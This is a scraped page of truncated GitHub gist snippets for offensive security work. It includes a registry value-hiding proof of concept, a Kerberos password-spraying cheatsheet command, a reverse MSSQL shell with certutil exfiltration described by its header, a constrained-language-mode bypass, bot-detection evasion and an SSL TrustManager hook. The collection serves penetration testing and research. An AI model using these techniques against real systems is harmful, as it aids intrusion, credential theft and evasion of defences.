Myo Soe (aka Aung Khant) yehgdotnet

szski / GraphQL-Introspection-Query-Url-Encoded
Created Oct 6, 2019
Append this string after to test for introspection query
Graph-X /
Last active Oct 1, 2019
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
# IronPython / .NET Registry API
from Microsoft.Win32 import Registry
from time import sleep
# Create the test key and write a value whose name and data both start with a NUL byte
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
# Re-open the key and read the value names back through the same API
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
TarlogicSecurity /
Created May 14, 2019
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

mritunjay-k /
Last active Nov 24, 2019
Provide it a list of domains and it will show you which of them is 200 OK or 404 NOT FOUND (extremely helpful for web application bug hunting)
#!/usr/bin/env python
import requests
read_file = open(input("Enter path of the file containing subdomains: "), 'r')
for host in read_file:
    domain = host.rstrip("\n")
    try:  # loop body completed here: the gist is truncated at this point; request each host and report its status code
        resp = requests.get("http://" + domain, timeout=5)
        print("{0} -> {1}".format(domain, resp.status_code))
    except requests.RequestException as e:
        print("{0} -> error: {1}".format(domain, e))
# Author: b0yd @rwincey
# Website:
# Setup:
# -------------------------------------------------
# pip install selenium
# wget
# google-chrome-stable --version
# Visit to identify the right version
# wget
xassiz /
Created Mar 16, 2018
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz

I’m looking for any tips or tricks for making chrome headless mode less detectable. Here is what I’ve done so far:

Set my args as follows:

const run = (async () => {

    const args = [
staaldraad /
Last active Jul 30, 2021
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
mattifestation / RunscripthelperBypass.ps1
Created Oct 29, 2017
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
function Invoke-RunScriptHelperExpression {
Executes PowerShell code in full language mode in the context of runscripthelper.exe.
Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.
oleavr / trust-manager.js
Created Jun 8, 2017
How to implement an X509TrustManager using Frida
'use strict';
var TrustManager;
var manager;
Java.perform(function () {
var X509TrustManager = Java.use('');
TrustManager = Java.registerClass({
name: 'com.example.TrustManager',